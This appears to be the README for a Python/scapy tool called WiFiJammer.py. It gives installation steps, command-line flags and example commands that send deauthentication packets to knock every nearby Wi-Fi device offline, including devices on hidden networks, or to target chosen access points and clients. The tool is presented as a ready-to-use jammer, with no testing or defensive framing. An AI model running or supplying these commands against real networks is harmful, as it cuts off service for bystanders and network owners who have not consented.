Continuously Jams all the Devices In the Area. Start. It will continue on scanning the nearby Wireless networks and sending Deauthentication Packets.
Use Python version 2.7
and install scapy:
pip install scapy
git clone https://github.com/hash3liZer/WiFiJammer.py.git
cd WiFiJammer.py/
python wifijammer.py --help
python [scriptname] [argument...]
python wifijammer.py --all
-a, --ap= BSSID of Target AP
-c, --client= BSSID of Client (Requires Access Point Mac Address)
-h, --help This Help Manual
-o, --out= comma-seperated BSSID's which you don't want to send Deauth Packets
-a, --all Sent Deauth Packets to all nearby Devices.
Send Deauth packets to all nearby WiFi Networks. Even Hidden Networks.
python wifijammer.py --all
Send Deauth packets to only a specific Target Acess Point
python wifijammer.py -a FF:FF:FF:FF:FF:FF
Send Deauth packets to a specific client of a specific Access Point
python wifijammer.py -a FF:FF:FF:FF:FF:FF -c FF:FF:FF:FF:FF:FF
Send Deauth packets to all nearby devices other than FF:FF:FF:FF:FF:FF and BB:BB:BB:BB:BB:BB
python wifijammer.py --all --out=FF:FF:FF:FF:FF:FF,BB:BB:BB:BB:BB:BB:BB
Twitter: hash3liZer
Email : [email protected]